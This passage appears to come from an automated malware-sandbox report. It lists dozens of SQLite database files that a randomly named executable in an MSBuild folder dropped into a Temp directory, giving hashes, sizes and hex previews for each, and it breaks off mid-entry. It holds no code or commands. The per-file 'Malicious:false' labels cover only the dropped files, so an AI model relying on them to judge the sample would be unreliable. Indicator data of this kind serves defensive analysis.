                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\djKhjzHTuE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\e6FMfTuooR

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\eMJemUV7h2

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\eXx6ViEsc2

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5712781801655107
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:05A60B4620923FD5D53B9204391452AF
                                                                                      SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                      SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                      SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\f3iv5p3yNp

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\fsuMEl6Yeu

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\fzwvY8eLiU

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\gEarB3WZht

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\gjbUFLjURT

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\gpStJu2nrE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\gqSoeQKzRc

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\hiJ4lbL9ZM

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\hqRHLjcrmr

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\irKCwFOwzq

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\irXfHAsjj3

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\j1BmHD91pL

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\j1nkn5BTiZ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\j6niiWRl87

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\jCR2oilj5Z

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\jEPA3tmjK0

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\jQV7CSqQ53

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\jX7EBfhFho

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\jn8ZLrXO2y

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
